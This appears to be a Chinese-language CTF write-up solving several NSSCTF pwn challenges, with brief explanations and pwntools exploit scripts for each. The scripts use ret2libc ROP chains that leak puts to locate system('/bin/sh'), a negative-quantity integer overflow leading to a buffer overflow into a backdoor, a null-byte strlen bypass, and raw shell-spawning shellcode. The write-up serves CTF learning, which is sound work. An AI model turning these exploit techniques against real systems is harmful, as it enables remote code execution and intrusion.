0x1.guess me
简单猜数字 不用脚本 先输入50 如果大了就再输入25小了就75 以此类推
0x2.签到 自己签到吧
0x3.ezlibc
from pwn import *
io=remote('node4.anna.nssctf.cn',28843)
elf=ELF('./lit/pwn4')
libc=ELF('./lit/libc-2.31.so')
context(arch='amd64', os='linux', log_level='debug')
ret=0x400556
rdi=0x4007d3
main=elf.sym['main']
Padding = b'\x00' + b'A' * (0x60 - 0x01 + 0x08)
#ROPgadget --binary file_name --only "pop|ret"
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.sym['main']
Payload = Padding + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
io.sendline(Payload)
io.recvuntil(b'Ok,Message Received\n')
addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
print(hex(addr))
base = addr - libc.sym['puts']
system = base + libc.sym['system']
binsh = base + next(libc.search(b'/bin/sh'))
Payload = Padding + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
io.sendline(Payload)
io.interactive()
0x4.buy
整数溢出
存在后门
food函数中输入数量 v1为int类型 可以为负数 只要输入一个较大的负数即可使money>10000
再执行以下函数door()
read函数 可以溢出 buf距离rbp0xa 但是read可以读入0x10000 后门函数已经给出
exp python3语法
from pwn import *
r=remote('node6.anna.nssctf.cn',28860)
r.sendlineafter('your choice:\n',b'1')
r.sendlineafter('what do you want?\n',b'1')
r.sendlineafter('How many?\n',b'-1000000')
r.sendlineafter('your choice:',b'2')
r.sendlineafter('what do you want?\n',b'1')
r.sendlineafter('How many?\n',b'1')
payload=b'a'*18+p64(0x40154c)
r.send(payload)
r.interactive()
0x5.[SWPUCTF 2023 秋季新生赛]神奇的strlen
/x00 绕过strlen检测
然后利用泄露puts地址 得到libc基地址
exp python3
from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')
elf=ELF('strlen')
#libc=ELF('libc.so.6')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.sym['main']
ret=0x000000000040101a
rdi=0x0000000000401373
r=remote('node6.anna.nssctf.cn',28867)
#r=process('./strlen')
r.sendlineafter('How many bytes do you want to input?\n',b'1000')
payload=b'\x00'+b'a'*0x47 +p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
r.sendline(payload)
addr = u64(r.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
print(hex(addr))
libc=LibcSearcher('puts',addr)
#base = addr - libc.dump['puts']
dump_puts = libc.dump('puts')
base = addr - dump_puts
#system = base + libc.dump['system']
dump_system = libc.dump('system')
system = base + dump_system
#binsh = base + libc.dump(b'str_bin_sh')
binsh = base + libc.dump(b'str_bin_sh'.decode('utf-8'))
print(hex(base))
payload1=b'\x00'+b'a'*(0x48-0x1)+p64(ret) +p64(rdi) + p64(binsh) + p64(system)
r.sendline(payload1)
r.interactive()
0x6.shellcode
exp
直接利用pwntools写shellcode即可
from pwn import *
r=remote('node6.anna.nssctf.cn',28402)
context(os='linux', arch='amd64', log_level='debug')
shellcode=asm(shellcraft.sh())
r.send(shellcode)
r.interactive()